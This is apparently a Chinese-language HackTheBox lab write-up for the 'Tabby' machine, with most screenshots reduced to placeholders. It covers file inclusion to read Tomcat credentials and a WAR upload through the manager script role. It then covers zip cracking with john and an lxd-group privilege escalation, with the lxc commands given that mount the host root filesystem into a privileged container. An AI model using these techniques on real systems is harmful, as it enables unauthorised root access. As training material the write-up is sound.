Tabby - HackTheBox
Td

image

nmap扫描

image

image

image

貌似是个tomcat的站

先看看80

image

image

发现一个域名,添加到hosts文件

image

这里疑似一个文件包含

image

确实是文件包含,包含他本身看一下代码

image

这就是打开文件,并不存在包含执行文件

在看看8080

image

貌似就是个tomcat的后台

image

弱口令不行,爆破的话感觉也不太行,试试用文件包含去找一下配置文件

image

这里给提示了

image

获得密码

image

登录后也没发现上传war包的地方

image

image

发现很多这种curl请求,搜一下有没有什么说法

https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00

貌似是有个类似于接口的功能,可以上传war包

image

先生成一个war包

image

image

image

image

提权

在网站目录下发现一个疑似备份文件的压缩包

image

把他下载到攻击机进行解压缩

image

还需要密码,爆破一下

zz2john bakckup.zip

image

将密钥写入一个文件,在利用john进行爆破

image

image

image

解压后也没有可利用信息

image

passwd发现有ash用户,尝试用这个密码去切换

image

发现ash用户存在lxd组内,尝试用lxd提权

先在本地创建好所需文件

https://www.cnblogs.com/hirak0/p/16111530.html

image

上传到靶机

image

创建镜像

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

image

lxc init alpine privesc -c security.privileged=true

image

如果报错的话,则重新运行lxd init创建新的存储池

image

image

一路回车即可

挂载root目录

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

image

启动镜像,并进入镜像shell会话

lxc start privesc lxc exec privesc /bin/sh

image